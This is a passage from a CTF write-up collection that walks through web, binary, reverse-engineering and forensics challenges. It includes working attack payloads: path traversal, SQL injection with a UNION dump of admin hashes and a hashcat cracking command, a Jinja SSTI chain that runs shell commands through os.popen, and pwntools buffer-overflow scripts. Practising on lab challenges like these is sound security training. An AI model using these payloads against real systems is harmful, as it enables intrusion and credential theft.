This confirmed I was on the right track! The application was attempting to construct a path to the flag file but couldn't find it at the expected location.
After several attempts with different traversal patterns (like ../../../../flag.txt, ../../flag.txt, etc.), I eventually found the correct path to access the flag.

In the document upload form, I directly entered ../../../flag.txt as the stored name
The application accepted this input without validation.
From the time-off request details page, I could see the document was created with:

Name: flag.txt
Stored Name: ../../../flag.txt

I clicked the "Download Document" link which triggered the vulnerable code path

This way i got the Flag

flag{52948d88ee74b9bdab130c35c88bd406}

4. Weblog

Given File: Challange.zip

Weblog.zip

This CTF challenge involved exploiting multiple vulnerabilities in a Flask web application to gain access to the admin panel and ultimately perform command injection to retrieve the flag.
Vulnerability Discovery
- After analyzing the provided codebase, I identified several critical vulnerabilities:
  1. SQL Injection in the search functionality
  2. Weak password hashing (MD5)
  3. Command injection in the admin panel
  4. Input restrictions that could be bypassed
Application Structure
- The application consisted of multiple components:
- A search feature vulnerable to SQL injection
- A user authentication system
- An admin panel with command execution capabilities
- Two database tables: blog_posts and users
My first approach was to use the credentials found in entrypoint.py. This initially seemed promising as I was able to log in to the admin portal in the Docker simulation environment. I even managed to exploit command injection and retrieve what appeared to be the flag.

However, when I tried the same credentials on the actual challenge environment, they didn't work!
This was a classic CTF misdirection – a rabbit hole designed to waste time. This forced me to reconsider my approach and look deeper into the application code.
So First i Register a user and login using those credentials

While analyzing the search functionality, I discovered a SQL Injection vulnerability in the following code snippet:

raw_query = text(
                f"SELECT * FROM blog_posts WHERE title LIKE '%{query}%'")
            current_app.logger.info(f"Executing Raw Query: {raw_query}")
            posts = db.session.execute(raw_query).fetchall()
            current_app.logger.info(f"Query Results: {posts}")

Since user input (query) is directly concatenated into the SQL query without proper sanitization, we can exploit this to extract data from the database.

Bypassing Filters

I first attempted a basic SQL injection payload ' OR 1=1; -- and however, this didn't work. After experimenting further, I found that the following payload successfully bypassed the filter and listed all blog posts ' OR 1-1 #
Next, I attempted to extract data from the users table using a UNION injection payload:

' UNION SELECT id, username, password, 'content', 'author' FROM users WHERE role='admin' #

and we go the admin password in md5 hash.

I used Hashcat to crack the MD5 hash of the admin password.

hashcat -m 0 c1b8b03c5a1b6d4dcec9a852f85cac59 /usr/share/wordlists/rockyou.txt

Once decrypted, I logged into the admin panel using the obtained credentials. After gaining access, I explored the admin panel and identified a potential command injection vulnerability. This opened the door for further exploitation.

flag{b06fbe98752ab13d0fb8414fb55940f3}

5. Plantly

Given File: Challange.zip

Plantly.zip

When I first looked at the Plantly e-commerce site, it seemed like your typical plant shop application - user registration, product browsing, and a checkout system. Little did I know that hidden in this garden of code was a dangerous vulnerability just waiting to be exploited. This writeup details my journey through discovering and exploiting a Server-Side Template Injection (SSTI) vulnerability to capture the flag.
The first step was analyzing the codebase to understand the application structure:
A Flask application with several blueprints (auth, main, store, subscription)
User authentication system
Plant shopping features
Cart and checkout functionality
Receipt generation
While examining the code in store.py, something suspicious caught my eye - a potential SSTI vulnerability in the receipt generation function:

custom_requests = "".join(
    f"<li>Custom Request: {render_template_string(purchase.custom_request)}</li>" 
    for purchase in purchases if purchase.custom_request
)

This code directly passes user input (purchase.custom_request) to Flask's render_template_string() function without any sanitization. This is a classic recipe for disaster, as it allows user-supplied template code to be executed on the server.
To confirm this vulnerability, I followed these steps:

Use Given credentials to sigin on the Plantly website

Added a custom plant order to my cart with a simple test payload: {{7*7}}

Completed the checkout process

Viewed my receipt

When the receipt loaded, I saw that instead of displaying the literal string {{7*7}}, it showed 49. This confirmed the SSTI vulnerability - the server was evaluating my input as a template expression!
Now that I had confirmed the vulnerability, it was time to escalate to reading the flag file. I needed to find a way to access the filesystem. I first tried some common SSTI payloads but encountered obstacles:

{{ ''.__class__.__mro__[1].__subclasses__()[40]('flag.txt').read() }}

This resulted in a server error, likely because the class at index 40 wasn't the file reader class in this environment.
I then tried to enumerate all subclasses:

{{ ''.__class__.__mro__[1].__subclasses__() }}

This worked and dumped a large list of Python classes, but it was hard to identify which one would allow file access.

I modified this code to the class which i wanted and got the flag

{% for c in ''.__class__.__mro__[1].__subclasses__() %}{% if c.__name__ == 'WarningMessage' %}{{ c.__init__.__globals__['__builtins__']['__import__']('os').popen('cat flag.txt').read() }}{% endif %}{% endfor %}

And voilà! The flag was revealed in the receipt page.

flag {982e3b7286ee603d8539f987b65b90d4}

Binary Exploitation

1. Echo

Given File: Echo

Echo.zip

We have given a ELF binary

Secondly all i check the security of this binary using checksec.
- and luckily there is no protection.

In Next step i see the functions of this using pwngdb tool and there is Win function available so we just to do Ret2Win Attack.
- (Reference: https://www.youtube.com/watch?v=eg0gULifHFI)

I make a simple script for this using pwntools,

pwn1.py

from pwn import *

# Load the binary
binary = ELF('./echo')

# Connect to remote challenge
p = remote('challenge.ctf.games', 31084)

# Address of win function
win_address = p64(0x401216)

# Buffer overflow offset: 128 bytes for the buffer + 8 bytes for the saved base pointer = 136 bytes
buffer_offset = 136

# Craft the payload
payload = b'A' * buffer_offset + win_address

# Send the payload and interact with the shell
p.sendline(payload)
p.interactive()

Working in short (I would recommend you to see the previously given reference video for in-depth understanding)
- i opened ghidra for see the buffer size and here is the main code,

undefined8 main(EVP_PKEY_CTX *param_1)

{
  char local_88 [128];
  
  init(param_1);
  puts("Give me some text and I\'ll echo it back to you: ");
  gets(local_88);
  puts(local_88);
  return 0;
}

Buffer size is 128 and 8 byte for base point so total 136 byte of data it can accept and after that this will rewrite the pointer address where we provided the win func address so the pointer redirect to that function and execute it
And When i run this script i got the flag,

flag{4f4293237e37d06d733772a087299f17}

2. Additional Information Needed

Given File: challenge.elf

challenge.zip

The Given file is ELF file and when i check the binary security using checksec i founf that there is ony one RELRO security is implemented partially.

It contains getFlag() so,
I tried previous script by replacing win function’s address with this and other things but it does not work so i see the ghidra code,

Here is the getFlag() code,

/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */

undefined4 getFlag(int param_1,int param_2)

{
  undefined4 uVar1;
  char local_3c [48];
  FILE *local_c;
  
  if (param_1 * param_2 == 0x23) {
    local_c = fopen("flag.txt","r");
    if (local_c != (FILE *)0x0) {
      fgets(local_3c,0x30,local_c);
      puts(local_3c);
      fclose(local_c);
    }
    uVar1 = 0;
  }
  else {
    puts("Nope!");
    uVar1 = 0xffffffff;
  }
  return uVar1;
}

By looking the code we can say that this not a straight forward but we also need pass the parameters to pass the condition so make a script for it.

pwn1.py

from pwn import *

# Load the binary (32-bit ELF)
binary = ELF('./challenge.elf')

# Connect to remote challenge
p = remote('challenge.ctf.games', 30591)

# Address of getFlag function
getFlag_address = binary.symbols["getFlag"]

# Buffer overflow offset: 36 bytes (buffer) + 4 bytes (saved EBP) = 40 bytes
offset = 40

# Craft the payload:
# [padding] + [getFlag address] + [fake return] + [first arg: 5] + [second arg: 7]
payload = b"A" * offset
payload += p32(getFlag_address)  # Overwrite saved return address with getFlag()
payload += p32(0xdeadbeef)       # Fake return address (won't be used)
payload += p32(5)                # First argument (will be at [ebp+8])
payload += p32(7)                # Second argument (will be at [ebp+12])

# Send the payload and interact
p.sendline(payload)
p.interactive()

We just passing the argument which succeed the condition,
- if (param_1 * param_2 == 0x23) and 7 * 5 = 35 == 0x23
- Eventually condition pass and we got the flag.

flag{8e9e2e4ec228db4207791eOa534716c3}

Reverse Engineering

1. An Offset Amongst Friends

Given File: an-offset

an-offset.zip

It is a ELF file which kind exe of linux.

I open this binary in ghidra for analysis and try to analyze the decompiled c code and see the different function.
I got something interesting in this FUN_001011c function.

void FUN_001011c9(long param_1)

{
  long in_FS_OFFSET;
  int local_3c;
  undefined8 local_38;
  undefined8 local_30;
  undefined8 local_28;
  undefined7 local_20;
  undefined uStack_19;
  undefined7 uStack_18;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_38 = 0x3536647c68626d67;
  local_30 = 0x3436333935363234;
  local_28 = 0x6237386232326432;
  local_20 = 0x66393339626266;
  uStack_19 = 0x35;
  uStack_18 = 0x7e6438313934;
  for (local_3c = 0; *(char *)((long)&local_38 + (long)local_3c) != '\0'; local_3c = local_3c + 1) {
    *(char *)(param_1 + local_3c) = *(char *)((long)&local_38 + (long)local_3c) + -1;
  }
  *(undefined *)(param_1 + local_3c) = 0;
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

I try to unhex the give hex stored in different variables but it doesn’t make any sense.

After that i analyze the code by converting it to C code using ChatGPT,

#include <stdio.h>

// This function decodes an encoded string and writes it into the buffer pointed to by 'dest'.
// The encoded string is stored in a contiguous byte array built from the constants in the disassembly.
void FUN_001011c9(char *dest) {
    // The encoded bytes are stored in little-endian order as they would appear in memory.
    // They correspond to the following blocks from the disassembly:
    //
    // local_38 = 0x3536647c68626d67  -> bytes: 0x67, 0x6d, 0x62, 0x68, 0x7c, 0x64, 0x36, 0x35
    // local_30 = 0x3436333935363234  -> bytes: 0x34, 0x32, 0x36, 0x35, 0x39, 0x33, 0x36, 0x34
    // local_28 = 0x6237386232326432  -> bytes: 0x32, 0x64, 0x32, 0x32, 0x62, 0x38, 0x37, 0x62
    // local_20 = 0x66393339626266    -> stored in 7 bytes: 0x66, 0x62, 0x62, 0x39, 0x33, 0x39, 0x66
    // uStack_19 = 0x35             -> 1 byte: 0x35
    // uStack_18 = 0x7e6438313934    -> stored in 7 bytes (with a null terminator at the end): 
    //          little-endian: 0x34, 0x39, 0x31, 0x38, 0x64, 0x7e, 0x00
    unsigned char encoded[] = {
        // local_38 (8 bytes)
        0x67, 0x6d, 0x62, 0x68, 0x7c, 0x64, 0x36, 0x35,
        // local_30 (8 bytes)
        0x34, 0x32, 0x36, 0x35, 0x39, 0x33, 0x36, 0x34,
        // local_28 (8 bytes)
        0x32, 0x64, 0x32, 0x32, 0x62, 0x38, 0x37, 0x62,
        // local_20 (7 bytes)
        0x66, 0x62, 0x62, 0x39, 0x33, 0x39, 0x66,
        // uStack_19 (1 byte)
        0x35,
        // uStack_18 (7 bytes)
        0x34, 0x39, 0x31, 0x38, 0x64, 0x7e, 0x00
    };

    int i = 0;
    // Loop until a null byte is found in the encoded data.
    while (encoded[i] != 0) {
        // Subtract 1 from each byte to decode it.
        dest[i] = encoded[i] - 1;
        i++;
    }
    // Append a null terminator.
    dest[i] = '\0';
}

int main(void) {
    // Allocate a buffer large enough to hold the decoded string.
    char decoded[50];
    
    FUN_001011c9(decoded);
    printf("Decoded string: %s\n", decoded);
    
    return 0;
}

This code is just converting the little-endian hex to big-endian notation. and also subtracting 1 from each byte and combining it as ASCII.

                 ((LE to BE) - 1)
				        
35 36 64 7c 68 62 6d 67 	==> 	66 6c 61 67 7b 63 35 34
34 36 33 39 35 36 32 34 	==> 	33 31 35 34 38 32 35 33
62 37 38 62 32 32 64 32 	==> 	31 63 31 31 61 37 36 61
66 39 33 39 62 62 66 		  ==> 	65 61 61 38 32 38 65
35 							           ==> 	34
7e 64 38 31 39 34 			  ==> 	33 38 30 37 63 7d

66 6c 61 67 7b 63 35 34 33 31 35 34 38 32 35 33 31 63 31 
31 61 37 36 61 65 61 61 38 32 38 65 34 33 38 30 37 63 7d

After unhex it i got the flag,

flag{c54315482531c11a76aeaa828e43807c}

2. A Powerful Shell

Given File: challenge.psl

challenge.ps1

After opening this in editor i found that there is long base64 encoded string.
So i tries to decode it.

# Check if being debugged
if ($PSDebugContext) {
    Write-Output "No debugging allowed!"
    exit
}

# Embedded and encoded layer 2
$encoded = "JGRlY29kZWQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQm
FzZTY0U3RyaW5nKCdabXhoWjNzME5XUXlNMk14WmpZM09EbGlZV1JqTVRJ
ek5EVTJOemc1TURFeU16UTFObjA9JykNCiRmbGFnID0gW1N5c3RlbS5UZX
h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGRlY29kZWQpDQoNCiMg
T25seSBzaG93IGZsYWcgaWYgc3BlY2lmaWMgZW52aXJvbm1lbnQgdmFyaW
FibGUgaXMgc2V0DQppZiAoJGVudjpNQUdJQ19LRVkgLWVxICdTdXAzclMz
Y3IzdCEnKSB7DQogICAgV3JpdGUtT3V0cHV0ICRmbGFnDQp9IGVsc2Ugew
0KICAgIFdyaXRlLU91dHB1dCAiTmljZSB0cnkhIEJ1dCB5b3UgbmVlZCB0
aGUgbWFnaWMga2V5ISINCn0="
$bytes = [Convert]::FromBase64String($encoded)
$decodedScript = [System.Text.Encoding]::UTF8.GetString($bytes)

# Execute with specific arguments
$argumentList = "-NoProfile", "-NonInteractive", "-Command", $decodedScript

# Start new PowerShell process
$startInfo = New-Object System.Diagnostics.ProcessStartInfo
$startInfo.FileName = "powershell.exe"
$startInfo.Arguments = $argumentList -join ' '
$startInfo.RedirectStandardOutput = $true
$startInfo.RedirectStandardError = $true
$startInfo.UseShellExecute = $false
$startInfo.CreateNoWindow = $true

$process = New-Object System.Diagnostics.Process
$process.StartInfo = $startInfo
$process.Start() | Out-Null
$output = $process.StandardOutput.ReadToEnd()
$process.WaitForExit()

Write-Output $output
}

After Decoding this Base64 i got another code,

$decoded = [System.Convert]::FromBase64String('ZmxhZ3s0NWQyM2MxZjY3ODliY
WRjMTIzNDU2Nzg5MDEyMzQ1Nn0=')
$flag = [System.Text.Encoding]::UTF8.GetString($decoded)

# Only show flag if specific environment variable is set
if ($env:MAGIC_KEY -eq 'Sup3rS3cr3t!') {
    Write-Output $flag
} else {
    Write-Output "Nice try! But you need the magic key!"
}

This code also contains another base64 string i try to decode that also and got the flag.

flag{45d23c1f6789badc1234567890123456}

3. String Me Along

Given File: string-me-along

string-me-along.zip

As per challenge description i got a hint that using string command maybe something gonna reveal.

Although the flag is visible but there are some extra characters which seems not part of it so i tried first enter the highlighted password (unlock_me_123) after running the binary and got the flag.

 flag{850de1a29ab50b6e5ad958334b68d5bf}

4. Math For Me

Given File: math4me

math4me

First check the type of file and how its working. Its an ELF (Executable and Linked format) file. So when executed it, it asks for an special number, which I think we need to find to get the flag.

Checked strings of the file using command: strings math4me.
From your strings output, we found:
- "Congratulations! Here's your flag: %s" → Suggests the flag is revealed upon correct input.
- compute_flag_char and check_number → key functions that might validate the number.
I used this command objdump -d math4me | less to disassemble the binary. Below is the disassembled check_number function.

Now with the help of chatgpt, analysed the function and got the secret number
Understanding the Function

Input Handling:
- The function takes an integer input in edi and stores it in rbp - 0x14.
- The value is then moved around different registers.
Computation:

13d7:  c1 e0 02   shl    $0x2,%eax   # Multiply input by 4
13da:  01 d0      add    %edx,%eax   # Add original input (result = 5 * input)
13dc:  83 c0 04   add    $0x4,%eax   # Add 4 (result = 5 * input + 4)

> This means: result=5 × input + 4

Division and Rounding:

13e7:  c1 ea 1f   shr    $0x1f,%edx   # Handles negative input adjustment
13ec:  d1 f8      sar    $1,%eax      # Divide by 2 (Arithmetic Shift Right)

> This means: final result = (5 × input + 4) / 2

Final Checks

13f1:  83 6d fc 0a   subl   $0xa,-0x4(%rbp)   # Subtract 10
13f5:  83 7d fc 2a   cmpl   $0x2a,-0x4(%rbp)  # Compare with 42

The condition:  final result−10=42
Rearranging:    final result = 52

Solving for Input:

(5 x input + 4) / 2 = 52
5 x input + 4 = 52 * 2 = 104
5 x input = 104 - 4 = 100
input = 100 / 5 = 20

Executing the script
As we solved the equation off check_number function, now try entering 20 as the secret number.
Hurrey!! It worked. We got the flag.

flag{h556cdd`=ag.c53664:45569368391gc}

5. letters2nums

Given Files: encflag.txt and letters2nums.elf

encflag.txt

letters2nums

Understanding the challenge
- This challenge is about reverse engineering the letters2nums.elf binary to decode the numbers in encflag.txt
- Executed the elf file to see how it works. It gives below error

Next Step,
- Checked strings of the binary. I noticed some functions like encodeChars, writeFlag, and readFlag. The function names suggest that encodeChars converts letters to numbers, meaning we need to reverse this process.
- Disassembling the binary using command: objdump -d letters2nums.elf. Below are the disassembled function

Now again with the help of chatgpt, analysing the function.
The encodeChars function takes two char values as input and combines them into a short (16-bit integer).

It moves the first character (edi) into dl and the second character (esi) into al.
It shifts the first character left by 8 bits (c1 e0 08), effectively making it the high byte of a 16-bit integer.
It ORs (09 d0) the second character with this shifted value, combining them into a single short (16-bit) value.
It returns this combined value.
- lly, $encodedValue =(char1≪8)∣char2$
- For eg. 'H' (ASCII 72) and 'i' (ASCII 105)
```
  $encodedValue: (72≪8)∣105=(18432)∣(105)=18537$
```
It means this function is encoding two characters into a single 16-bit integer and it might be how encflag.txt was encoded — each two-character pair was converted into a number.
So we need to reverse this to decode the data given in encflag.txt
- Extract the high byte: value >> 8
- Extract the low byte: value & 0xFF
- Convert both back to characters.
- Contents of encflag.txt

21608, 26995, 8297, 29472, 24864, 27759, 28263, 8289, 28260, 8291,
    28526, 30319, 27765, 25701, 25632, 30561, 31008, 29807, 8308, 29305,
    8289, 28260, 8296, 26980, 25888, 29800, 25888, 26220, 24935, 14950,
    27745, 26491, 13154, 12341, 12390, 13665, 14129, 13925, 13617, 25400,
    14693, 14643, 12851, 25185, 26163, 24887, 25143, 13154, 32000

Now again with the help of chatgpt, I generated a python script to decode these encrypted values.

encoded_values = [
    21608, 26995, 8297, 29472, 24864, 27759, 28263, 8289, 28260, 8291,
    28526, 30319, 27765, 25701, 25632, 30561, 31008, 29807, 8308, 29305,
    8289, 28260, 8296, 26980, 25888, 29800, 25888, 26220, 24935, 14950,
    27745, 26491, 13154, 12341, 12390, 13665, 14129, 13925, 13617, 25400,
    14693, 14643, 12851, 25185, 26163, 24887, 25143, 13154, 32000
]

def decode_values(encoded_values):
    decoded_chars = []
    for value in encoded_values:
        high_byte = (value >> 8) & 0xFF
        low_byte = value & 0xFF
        decoded_chars.append(chr(high_byte))
        decoded_chars.append(chr(low_byte))
    return "".join(decoded_chars)

decoded_flag = decode_values(encoded_values)
print("Decoded Flag:", decoded_flag)

Understanding the python script
- make a list and paste the values from encflag.txt
- In the function, first, it creates an empty dictionary to store the decoded values.
- Then using loop, it iterates over encoded_values list. and extract high bytes and store in variable high_byte, similarly, extract low byte and store in low_byte var.
- Then it converts hight and low byte to char like this chr(high_byte) and appends into the empty list.
- This loop goes on until all the values in the encoded_values list are done with.
- The the function then returns the decoded_chars list by joinig it into string
- Finally print the decoded_flag string. And we got the flag 🥳

flag{3b050f5a716e51c89e9323baf3a7b73b}

6. Either Or

Given File: either-or

either-or.zip

I tried open it in ghidra and try to analyze it and what i found is main function.

undefined8 main(void)

{
  int iVar1;
  long in_FS_OFFSET;
  undefined8 local_d8;
  undefined8 local_d0;
  undefined local_c8 [64];
  char local_88 [64];
  undefined local_48 [56];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_d8 = 0x635f677265707266;
  local_d0 = 0x7165626a66666e;
  puts("Welcome to the Encoding Challenge!");
  printf("Enter the secret word: ");
  __isoc99_scanf(&DAT_00102043,local_c8);
  encode_input(local_c8,local_88);
  iVar1 = strcmp(local_88,(char *)&local_d8);
  if (iVar1 == 0) {
    decode_flag(local_48);
    printf("Well done! Here\'s your flag: flag{%s}\n",local_48);
  }
  else {
    puts("Not quite right. Keep trying!");
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

Also there another functions call named encode_input and decode_flag,

void encode_input(long param_1,long param_2)

{
  int iVar1;
  int local_c;
  
  for (local_c = 0; *(char *)(param_1 + local_c) != '\0'; local_c = local_c + 1) {
    if ((*(char *)(param_1 + local_c) < 'a') || ('z' < *(char *)(param_1 + local_c))) {
      if ((*(char *)(param_1 + local_c) < 'A') || ('Z' < *(char *)(param_1 + local_c))) {
        *(undefined *)(param_2 + local_c) = *(undefined *)(param_1 + local_c);
      }
      else {
        iVar1 = *(char *)(param_1 + local_c) + -0x34;
        *(char *)(param_2 + local_c) = (char)iVar1 + (char)(iVar1 / 0x1a) * -0x1a + 'A';
      }
    }
    else {
      iVar1 = *(char *)(param_1 + local_c) + -0x54;
      *(char *)(param_2 + local_c) = (char)iVar1 + (char)(iVar1 / 0x1a) * -0x1a + 'a';
    }
  }
  *(undefined *)(param_2 + local_c) = 0;
  return;
}

void decode_flag(long param_1)

{
  long in_FS_OFFSET;
  uint local_3c;
  undefined8 local_38;
  undefined8 local_30;
  undefined8 local_28;
  undefined8 local_20;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  local_38 = 0x7b7a712676757224;
  local_30 = 0x7570207674737071;
  local_28 = 0x7324267a7277237a;
  local_20 = 0x7b7a242427772073;
  for (local_3c = 0; local_3c < 0x20; local_3c = local_3c + 1) {
    *(byte *)(param_1 + (int)local_3c) = *(byte *)((long)&local_38 + (long)(int)local_3c) ^ 0x42;
  }
  *(undefined *)(param_1 + 0x20) = 0;
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

So first i convert the encode_input function to C using GPT,

#include <stdio.h>

void encode_input(const char *input, char *output) {
    int i = 0;
    while (input[i] != '\0') {
        char c = input[i];

        if (c >= 'a' && c <= 'z') {
            output[i] = ((c - 'a' - 84) % 26 + 26) % 26 + 'a';  // Ensure wrap-around
        } 
        else if (c >= 'A' && c <= 'Z') {
            output[i] = ((c - 'A' - 52) % 26 + 26) % 26 + 'A';  // Ensure wrap-around
        } 
        else {
            output[i] = c;  // Keep non-alphabetic characters unchanged
        }

        i++;
    }
    output[i] = '\0';  // Null-terminate the output
}

Explanation:- The function shifts letters backward in the alphabet while keeping non-alphabetic characters unchanged.
- Lowercase letters (a-z) are shifted back by 84 positions
  - (effectively 84 % 26 = 6 places backward).
  - $NewChar = ( OriginalChar − 84 − 'a') mod 26 + ‘a’$
- Uppercase letters (A-Z) are shifted back by 52 positions
  - (effectively 52 % 26 = 0, meaning no change).
  - $NewChar = ( OriginalChar − 52 − 'A') mod 26 + 'A'$
- Non-alphabetic characters remain unchanged.
(In Short It just apply ROT13 on given input)
Now Secondly, i convert the decode_flag function to C using GPT,

#include <stdio.h>
#include <stdint.h>
#include <string.h>

void decode_flag(char *output) {
    uint8_t encrypted_flag[32] = {
        0x7b, 0x7a, 0x71, 0x26, 0x76, 0x75, 0x72, 0x24,
        0x75, 0x70, 0x20, 0x76, 0x74, 0x73, 0x70, 0x71,
        0x73, 0x24, 0x26, 0x7a, 0x72, 0x77, 0x23, 0x7a,
        0x7b, 0x7a, 0x24, 0x24, 0x27, 0x77, 0x20, 0x73
    };

    for (int i = 0; i < 32; i++) {
        output[i] = encrypted_flag[i] ^ 0x42;  // XOR decryption
    }
    output[32] = '\0';  // Null-terminate the string
}

Unintendent Way :-
From Here we directly get the flag but maybe this is not intendent way,
Just Converting this to LE to BE and XOR with 0x42

                 ((LE to BE) - 1)

7b 7a 71 26 76 75 72 24 ==> 24 72 75 76 26 71 7a 7b 
75 70 20 76 74 73 70 71 ==> 71 70 73 74 76 20 70 75 
73 24 26 7a 72 77 23 7a ==> 7a 23 77 72 7a 26 24 73 
7b 7a 24 24 27 77 20 73 ==> 73 20 77 27 24 24 7a 7b

Intendent Way :-
This Code is just doing XOR with 0x42 with each byte given.
Now let’s Analyze the C code of Main,

#include <stdio.h>
#include <string.h>

void encode_input(char *param_1, char *param_2);
void decode_flag(char *param);

int main(void) {
    int iVar1;
    long in_FS_OFFSET;
    unsigned long long Password_Part1;
    unsigned long long Password_Part2;
    char local_c8[64];
    char local_88[64];
    char local_48[56];
    long local_10;
  
    local_10 = *(long *)(in_FS_OFFSET + 0x28);
    Password_Part1 = 0x635f677265707266;  // "frperg_c"
    Password_Part2 = 0x7165626a66666e;    // "nffjbeq"

    // Password = 0x7165626A66666E635F677265707266 // "frperg_cnffjbeq" ==(ROT13)==> 
    //"secret_password"
    
    puts("Welcome to the Encoding Challenge!");
    printf("Enter the secret word: ");
    scanf("%63s", local_c8);  // Read user input safely
  
    encode_input(local_c8, local_88);  // Encode the input
  
    iVar1 = strcmp(local_88, (char *)&Password_Part1);  // Compare encoded input with "frperg_c"
    if (iVar1 == 0) {
        decode_flag(local_48);  // Decode the flag if input matches
        printf("Well done! Here's your flag: flag{%s}\n", local_48);
    } else {
        puts("Not quite right. Keep trying!");
    }
  
    if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
        __stack_chk_fail();  // Stack protection check
    }
  
    return 0;
}

As per Main code we get the string which is comparing secret_password so when i use that in binary i got the flag.

flag{f074d38932164b278a508df11b5eff89}

Forensics

1. Free Range Packets

Given File: freeRangePackets.pcapng

freeRangePackets.pcapng

This Pcap file contains the conversation of bluetooth protocol and our task is to carve the flag from payload part because it is spreaded over all in payload of Bluetooth L2CAP Protocl’s payload as per the image.
So i carve this data using https://tshark.dev/ Tshark Tool and some bash filtering command.

Here it the whole command,

tshark -r freeRangePackets.pcapng -Y "bthci_acl" -V -x | \
grep "Payload:" | \
sed 's/ *Payload: //g' | \
tr -d '\n' | \
sed 's/0bef03//g' | \
sed 's/9a//g' | \
sed 's/09ff01065c//g'

Breakdown of this command with sublime text,
1. Step One Getting everything bthci-acl in short getting filtering all packets which contains our payload using this command
  - tshark -r freeRangePackets.pcapng -Y "bthci_acl" -V -x

We Grep all fields which contains Payload using this command,

| grep "Payload:"

Now we remove the Payload text and new line and combine all the hex using this command,
- sed 's/ *Payload: //g' | tr -d '\n'
Now as per above wireshark image we only need last 2 byes for our actual printable data so we remove all other hex using this command,
- sed 's/0bef03//g' |
We also remove the 9a which non-printable character and 09ff01065c is garbage data so we remove it using this command,
- sed 's/9a//g' | sed 's/09ff01065c//g'
This is final hex we got and when we convert it we got our flag

flag{b5be72ab7e0254c056ffb57a0db124ce}

2. ClickityClack

Given File: click.pcapng

click.pcapng

When i open this pcapng in wireshark i found that this is USB Protocol conversation and i have already solved such challenge and also seen the video of one and only https://www.youtube.com/watch?v=0HXL4RGmExo so i am familier with this technique

For this i have used this github repo to extract the content named 5h4rrk https://github.com/5h4rrk/CTF-Usb_Keyboard_Parser/ and after using this i got the flag,
- For technicalities see this video ( https://www.youtube.com/watch?v=0HXL4RGmExo)
- (Credit Goes to https://github.com/5h4rrk/ and https://www.youtube.com/watch?v=0HXL4RGmExo)

import subprocess,sys,os
import shlex,string
usb_codes = {
    "0x04":['a','A'],"0x05":['b','B'], "0x06":['c','C'], "0x07":['d','D'], "0x08":['e','E'], "0x09":['f','F'],"0x0A":['g','G'],"0x0B":['h','H'], "0x0C":['i','I'], "0x0D":['j','J'], "0x0E":['k','K'], "0x0F":['l','L'],"0x10":['m','M'], "0x11":['n','N'], "0x12":['o','O'], "0x13":['p','P'], "0x14":['q','Q'], "0x15":['r','R'],"0x16":['s','S'], "0x17":['t','T'], "0x18":['u','U'], "0x19":['v','V'], "0x1A":['w','W'], "0x1B":['x','X'],"0x1C":['y','Y'], "0x1D":['z','Z'], "0x1E":['1','!'], "0x1F":['2','@'], "0x20":['3','#'], "0x21":['4','$'],"0x22":['5','%'], "0x23":['6','^'], "0x24":['7','&'], "0x25":['8','*'], "0x26":['9','('], "0x27":['0',')'],"0x28":['\n','\n'], "0x29":['[ESC]','[ESC]'], "0x2A":['[BACKSPACE]','[BACKSPACE]'], "0x2B":['\t','\t'],"0x2C":[' ',' '], "0x2D":['-','_'], "0x2E":['=','+'], "0x2F":['[','{'], "0x30":[']','}'], "0x31":['\',"|'],"0x32":['#','~'], "0x33":";:", "0x34":"'\"", "0x36":",<",  "0x37":".>", "0x38":"/?","0x39":['[CAPSLOCK]','[CAPSLOCK]'], "0x3A":['F1'], "0x3B":['F2'], "0x3C":['F3'], "0x3D":['F4'], "0x3E":['F5'], "0x3F":['F6'], "0x41":['F7'], "0x42":['F8'], "0x43":['F9'], "0x44":['F10'], "0x45":['F11'],"0x46":['F12'], "0x4F":[u'→',u'→'], "0x50":[u'←',u'←'], "0x51":[u'↓',u'↓'], "0x52":[u'↑',u'↑']
   }
data = "usb.capdata"
filepath = sys.argv[1]

def keystroke_decoder(filepath,data):
    out = subprocess.run(shlex.split("tshark -r  %s -Y \"%s\" -T fields -e %s"%(filepath,data,data)),capture_output=True)
    output = out.stdout.split() # Last 8 bytes of URB_INTERPRUT_IN
    message = []
    modifier =0
    count =0
    for i in range(len(output)):
        buffer = str(output[i])[2:-1]
        if (buffer)[:2] == "02" or (buffer)[:2] == "20":
            for j in range(1):
                count +=1 
                m ="0x" + buffer[4:6].upper()
                if m in usb_codes and m == "0x2A": message.pop(len(message)-1)
                elif m in usb_codes: message.append(usb_codes.get(m)[1])
                else: break
        else:
            if buffer[:2] == "01": 
                modifier +=1
                continue   
            for j in range(1):
                count +=1 
                m  = "0x" + buffer[4:6].upper()
                if m in usb_codes and m == "0x2A": message.pop(len(message)-1)
                elif m in usb_codes : message.append(usb_codes.get(m)[0])
                else: break

    if modifier != 0:
        print(f'[-] Found Modifier in {modifier} packets [-]')
    return message

if len(sys.argv) != 2 or os.path.exists(filepath) != 1:
    print("\nUsage : ")
    print("\npython Usb_Keyboard_Parser.py <filepath>")
    print("Created by \t\t\t Sabhya <sabhrajmeh05@gmail.com\n")
    print("Must Install tshark & subprocess first to use it\n")
    print("To install run \"sudo apt install tshark\"")
    print("To install run \"pip install subprocess.run\"")
    exit(1)

function_call = keystroke_decoder(filepath,data)
hid_data =''

for _ in range(len(function_call)): hid_data += function_call[_]

if(hid_data == ''):
    function_call = keystroke_decoder(filepath, "usbhid.data")
    print("\n[+] Using filter \"usbhid.data\" Retrived HID Data is : \n")
    for _ in range(len(function_call)): print(function_call[_],end='')
    print("\n")
else:
    print("\n[+] Using filter \"usb.capdata\" Retrived HID Data is : \n")
    print(hid_data)

flag{a3ce310e9a0dc53bc030847192e2f585}

Scripting

1. Coding Mountains

Given File: mountains.json

mountains.json

Understanding the question and execution flow

